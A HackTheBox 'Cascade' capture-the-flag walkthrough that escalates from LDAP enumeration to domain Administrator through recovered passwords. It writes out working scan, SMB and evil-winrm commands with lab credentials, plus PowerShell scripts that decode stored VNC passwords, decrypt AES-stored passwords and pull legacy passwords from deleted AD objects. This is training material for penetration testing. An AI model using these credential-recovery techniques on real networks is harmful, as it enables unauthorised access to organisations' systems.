HackTheBox. Level Medium: Cascade Walkthrough. LDAP and Deleted Active Directory Objects

17 December 2024. Author: Lady Liberty

The article provides a step-by-step guide to port scanning, LDAP interaction, password decryption, and recovery of deleted objects. The material is useful for information security professionals who want to improve their pentesting and vulnerability research skills in corporate networks.

Cascade walkthrough

This walkthrough covers enumerating users through SMB and LDAP, recovering a password stored as a base64-encoded custom LDAP attribute, decoding a VNC password from a registry export, decrypting a stored password with the parameters recovered from a decompiled .NET library, and finally restoring credentials from a deleted object in the Active Directory Recycle Bin.

The lab is reached over VPN. Do not connect from a work computer or from a host holding sensitive data: the VPN drops you onto a private network shared with other, highly skilled offensive-security practitioners.

Recon

The machine has the IP address 10.10.10.182, which we add to /etc/hosts:

10.10.10.182	cascade.htb

First, we scan for open ports. A full nmap scan of every port takes a long time, so masscan does the initial sweep: all TCP and UDP ports through the tun0 interface at 500 packets per second.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.182 --rate=500

The host has many open ports. We hand that list to nmap to identify the services and pick out the ones we need.

nmap cascade.htb -p49172,49157,49154,135,53,5985,636,389,139,49155,445,3269,3268,49158,88

Now, to get more detailed information about the services running on the ports, let’s run the scan with the -A option.

nmap -A cascade.htb -p49172,49157,49154,135,53,5985,636,389,139,49155,445,3269,3268,49158,88

We start with SMB enumeration using enum4linux.

enum4linux -a cascade.htb

Save the list of users and their group memberships for later. Next, let's see what LDAP has to offer.

Entry Point

We use JXplorer to browse LDAP. Connect to the domain controller and walk through all the objects.

For the user Ryan Thompson we find a non-standard attribute, cascadeLegacyPwd, holding a base64 string.

Decoding the base64 gives the password.

USER

With credentials in hand, check which SMB shares are accessible using CrackMapExec.

cme smb cascade.htb -u "r.thompson" -p "rY4n5eva" --shares

Let's connect to the Data share.

smbclient -U r.thompson //10.10.10.182/Data

We list the share recursively, then download the files of interest and review their contents:

get "IT\Email Archives\Meeting_Notes_June_2018.html"
get "IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log"
get "IT\Logs\DCs\dcdiag.log"
get "IT\Temp\s.smith\VNC Install.reg"

The first file, the meeting notes, discusses a network migration and states that the TempAdmin account was given the same password as the regular Administrator account.

From the second file, the Recycle Bin log, we note what the ArkSvc account is allowed to do: it is the account moving objects into the AD Recycle Bin.

The third file has nothing of interest. The fourth, a registry export, contains the VNC password for the user s.smith as a hex value.

This value is decoded with vncpasswd.py: -d selects decode mode and -H tells it the input is hex.

vncpasswd.py -d -H 6bcf2a4b6e5aca0f
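For readers who want to do the decode without vncpasswd.py, here is an added PowerShell example; it is not part of the original article or of the vncpasswd.py tool. It relies on a fact fixed in the VNC source: the stored value is the first 8 bytes of the password, DES-encrypted in ECB mode under a hard-coded key, so anyone holding the blob can reverse it. The key bytes below are that fixed key in standard-DES order (the VNC code bit-reverses them internally). The function accepts either a bare hex string or the comma-separated hex form a .reg export uses.

```powershell
# Added example: decode a stored VNC password (from a .reg export or the
# registry) without vncpasswd.py. VNC "encrypts" the 8-byte password with
# DES-ECB under a fixed, public key, so the blob is effectively plaintext.
function ConvertFrom-VncPassword {
    [CmdletBinding()]
    param(
        # Accepts "6bcf2a4b6e5aca0f" or the .reg form "6b,cf,2a,4b,6e,5a,ca,0f"
        [Parameter(Mandatory, ValueFromPipeline)]
        [string]$Hex
    )
    process {
        # Strip commas, spaces and any "hex:" prefix left over from the .reg file
        $clean = $Hex -replace '[^0-9A-Fa-f]', ''
        if ($clean.Length -ne 16) {
            throw "Expected 8 bytes (16 hex digits) after cleanup, got $($clean.Length) digits"
        }
        $ct = [byte[]]::new(8)
        for ($i = 0; $i -lt 8; $i++) {
            $ct[$i] = [Convert]::ToByte($clean.Substring(2 * $i, 2), 16)
        }

        $des = [System.Security.Cryptography.DES]::Create()
        try {
            $des.Mode    = [System.Security.Cryptography.CipherMode]::ECB
            $des.Padding = [System.Security.Cryptography.PaddingMode]::None
            # The VNC fixed key, already in standard-DES byte order
            $des.Key     = [byte[]](0xE8, 0x4A, 0xD6, 0x60, 0xC4, 0x72, 0x1A, 0xE0)
            $pt = $des.CreateDecryptor().TransformFinalBlock($ct, 0, $ct.Length)
        }
        finally {
            $des.Dispose()
        }

        # Passwords shorter than 8 characters are NUL-padded before encryption
        [System.Text.Encoding]::ASCII.GetString($pt).TrimEnd([char]0)
    }
}

# Usage with the hex value taken from "VNC Install.reg" above:
ConvertFrom-VncPassword '6bcf2a4b6e5aca0f'
```

Run against the registry value above, this returns the same password the evil-winrm command below uses. Because DES only ever sees 8 bytes, VNC passwords longer than eight characters are silently truncated at storage time, which is worth remembering when the decoded value looks cut off.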

The enum4linux output shows that s.smith is a member of the Remote Management Users group, so we can try the WinRM service with the recovered password.

evil-winrm -i cascade.htb -u s.smith -p sT333ve2

USER 2

Let’s look at the SMB resources of this user:

cme smb cascade.htb  -u s.smith -p sT333ve2 --shares

The Audit$ share is available.

smbclient -U s.smith //10.10.10.182/Audit$

Download everything in it.

Among the downloaded files is a database; opening it, the LDAP table contains a set of credentials.

These credentials do not work as-is: the stored password is encrypted and is evidently decrypted by a dedicated program. The share also holds CascCrypto.dll and a C# executable that uses the library.

We decompile the program with dnSpy and locate the code that reads the password from the database and hands it to the decryption routine, together with the key used for decryption.

Decompiling the library reveals the cipher mode and the initialization vector.

We now have every decryption parameter: the ciphertext from the database, the key from the program, and the mode and IV from the library.

All that remains is to decrypt the password, which CyberChef can do in the browser.
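As an alternative to CyberChef, here is an added PowerShell example (not the article's code and not the lab's CascCrypto.dll) that reproduces the decryption path such a .NET helper exposes: the key comes from the calling program, the mode and IV from the library, the ciphertext from the database. It assumes AES in CBC mode with PKCS7 padding (the .NET Aes defaults) and a 16-character key and IV; the key, IV and plaintext below are constructed for the demonstration and are not the values recovered from the lab. The encrypt helper exists only to manufacture a sample blob so the round trip can be checked offline.

```powershell
# Added example: decrypt a password stored as base64(AES-CBC(plaintext)) the
# way a small .NET crypto helper would. Mode, padding, key and IV are set
# explicitly so they can be swapped for the ones read out of a decompiled DLL.
# Key, IV and plaintext here are CONSTRUCTED for the demo, not lab values.

function New-AesCbc {
    param([string]$Key, [string]$IV)
    $keyBytes = [System.Text.Encoding]::UTF8.GetBytes($Key)
    $ivBytes  = [System.Text.Encoding]::UTF8.GetBytes($IV)
    if ($keyBytes.Length -notin 16, 24, 32) {
        throw "AES key must be 16, 24 or 32 bytes, got $($keyBytes.Length)"
    }
    if ($ivBytes.Length -ne 16) {
        throw "AES IV must be 16 bytes (one block), got $($ivBytes.Length)"
    }
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key     = $keyBytes
    $aes.IV      = $ivBytes
    return $aes
}

# Only here to produce a sample ciphertext for the round trip
function Protect-LegacyPwd {
    param([Parameter(Mandatory)][string]$PlainText,
          [Parameter(Mandatory)][string]$Key,
          [Parameter(Mandatory)][string]$IV)
    $aes = New-AesCbc -Key $Key -IV $IV
    try {
        $pt = [System.Text.Encoding]::UTF8.GetBytes($PlainText)
        $ct = $aes.CreateEncryptor().TransformFinalBlock($pt, 0, $pt.Length)
        [Convert]::ToBase64String($ct)
    }
    finally { $aes.Dispose() }
}

# The step CyberChef performs in the article: base64 -> AES-CBC decrypt -> text
function Unprotect-LegacyPwd {
    param([Parameter(Mandatory)][string]$CipherTextB64,
          [Parameter(Mandatory)][string]$Key,
          [Parameter(Mandatory)][string]$IV)
    $aes = New-AesCbc -Key $Key -IV $IV
    try {
        $ct = [Convert]::FromBase64String($CipherTextB64)
        $pt = $aes.CreateDecryptor().TransformFinalBlock($ct, 0, $ct.Length)
        [System.Text.Encoding]::UTF8.GetString($pt)
    }
    finally { $aes.Dispose() }
}

# Constructed parameters: stand-ins for the key found in the executable and
# the IV found in the DLL. Both must be exactly 16 characters.
$key = 'D3m0K3y-16chars!'
$iv  = 'Constructed-IV00'

$blob = Protect-LegacyPwd -PlainText 'not-the-lab-password' -Key $key -IV $iv
"Stored form (what the LDAP table would hold): $blob"
"Decrypted: $(Unprotect-LegacyPwd -CipherTextB64 $blob -Key $key -IV $iv)"
```

When applying this to a real blob, a wrong key normally fails the PKCS7 padding check with a CryptographicException, while a wrong IV corrupts only the first 16 bytes, which for a short password is the whole value, so it comes back as garbage rather than an error. If the output is unreadable, re-check the IV and the string encoding the DLL uses (UTF-8 versus UTF-16) before doubting the key.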

The decrypted password belongs to ArkSvc. From the enum4linux results, this account is a member of both the Remote Management Users and the AD Recycle Bin groups, and, as the log showed earlier, it is the account that moves objects into the Recycle Bin.

Recall also that TempAdmin had the same password as Administrator, and that its account has since been deleted.

So, in a PowerShell session as ArkSvc, we check the Active Directory Recycle Bin for deleted objects that could be restored or that still hold useful data.

Get-ADObject -IncludeDeletedObjects -Filter {IsDeleted -eq $True}

The TempAdmin object is there. Pull all of its attributes for analysis:

Get-ADObject -Filter {SamAccountName -eq 'TempAdmin'} -IncludeDeletedObjects -Properties *

Among them is the same legacy password attribute we met earlier; decoding its base64 value gives the password, and since TempAdmin shared the Administrator password, it works for Administrator too.
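The two Get-ADObject calls above can be folded into one reusable query that also performs the decode. This is an added example, not the article's code; it assumes the ActiveDirectory module is available in the session and that deleted users carry the same cascadeLegacyPwd attribute seen on the live user earlier (the attribute name is a parameter, so it can be changed). The constructed stand-in object at the end only lets the decode be checked without a domain controller.

```powershell
# Added example: list deleted objects in the AD Recycle Bin that still carry a
# legacy-password attribute and decode it. Needs the ActiveDirectory module
# and an account with rights over deleted objects (e.g. AD Recycle Bin group).
function ConvertFrom-LegacyPwd {
    param([Parameter(Mandatory)][string]$Base64)
    try {
        [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($Base64))
    }
    catch {
        # Not every custom attribute is base64; show the raw value instead of failing
        "<not base64: $Base64>"
    }
}

function Get-DeletedLegacyPwd {
    [CmdletBinding()]
    param(
        # Attribute name is an ASSUMPTION carried over from the live user object
        [string]$Attribute = 'cascadeLegacyPwd'
    )
    # Deleted objects are hidden from normal queries; -IncludeDeletedObjects
    # is what makes the Recycle Bin visible. LastKnownParent tells you where
    # the object lived, which helps tell a retired service account from noise.
    Get-ADObject -IncludeDeletedObjects `
                 -Filter 'IsDeleted -eq $true -and ObjectClass -eq "user"' `
                 -Properties SamAccountName, LastKnownParent, whenChanged, $Attribute |
        Where-Object { $_.$Attribute } |
        ForEach-Object {
            [PSCustomObject]@{
                SamAccountName  = $_.SamAccountName
                LastKnownParent = $_.LastKnownParent
                LastChanged     = $_.whenChanged
                LegacyPwd       = ConvertFrom-LegacyPwd -Base64 $_.$Attribute
            }
        }
}

# Live use, from a session on the domain (RSAT / ActiveDirectory module):
# Get-DeletedLegacyPwd | Format-Table -AutoSize

# Offline check with a CONSTRUCTED stand-in for a deleted object:
$fake = [PSCustomObject]@{
    SamAccountName   = 'demo.user'
    cascadeLegacyPwd = [Convert]::ToBase64String(
        [System.Text.Encoding]::UTF8.GetBytes('demo-only-value'))
}
ConvertFrom-LegacyPwd -Base64 $fake.cascadeLegacyPwd
```

From a defender's side the same query is a useful audit: any custom attribute whose value decodes to readable text on live or deleted accounts is a credential leak that survives account deletion for the lifetime of the Recycle Bin.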

Connect over WinRM as Administrator and grab the flag.

evil-winrm -i cascade.htb -u Administrator -p baCT3r1aN00dles

Conclusion

The article walks through gaining access to the system and escalating privileges. It shows how a password exposed in a custom LDAP attribute gives the first foothold, how a VNC password recovered from a registry export opens WinRM, how a stored password is decrypted with the key, mode and IV recovered from a decompiled C# program and CascCrypto.dll using CyberChef, and finally how the Active Directory Recycle Bin is queried to recover the deleted TempAdmin object, whose legacy password is also the Administrator password.
